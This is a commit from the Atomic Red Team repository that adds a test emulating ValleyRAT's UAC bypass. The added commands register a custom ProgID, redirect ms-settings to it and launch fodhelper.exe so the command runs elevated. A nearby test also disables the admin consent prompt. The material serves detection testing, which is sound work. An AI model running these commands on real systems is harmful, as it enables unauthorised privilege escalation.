Uac bypassed via prog i ds (#2940)

* ShrinkLocker PIN,TPM Bitlocker Registry Modification * Revert "ShrinkLocker PIN,TPM Bitlocker Registry Modification" * Update T1548.002.yaml --------- Co-authored-by: Carrie Roberts <[email protected]>
redcanaryco · Sep 24, 2024 · df25f7e · df25f7e
1 parent e851100
commit df25f7e
Showing 1 changed file with 20 additions and 1 deletion.
diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml
@@ -692,4 +692,23 @@ atomic_tests:
       reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
     cleanup_command: |
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f
-    name: command_prompt
+    name: command_prompt
+
+- name: UAC bypassed by Utilizing ProgIDs registry.
+  auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
+  description: |
+    This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f
+
+      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f
+      
+      echo Triggering fodhelper.exe for potential privilege escalation...
+      start fodhelper.exe
+    cleanup_command: |
+       reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
+       reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
+    name: command_prompt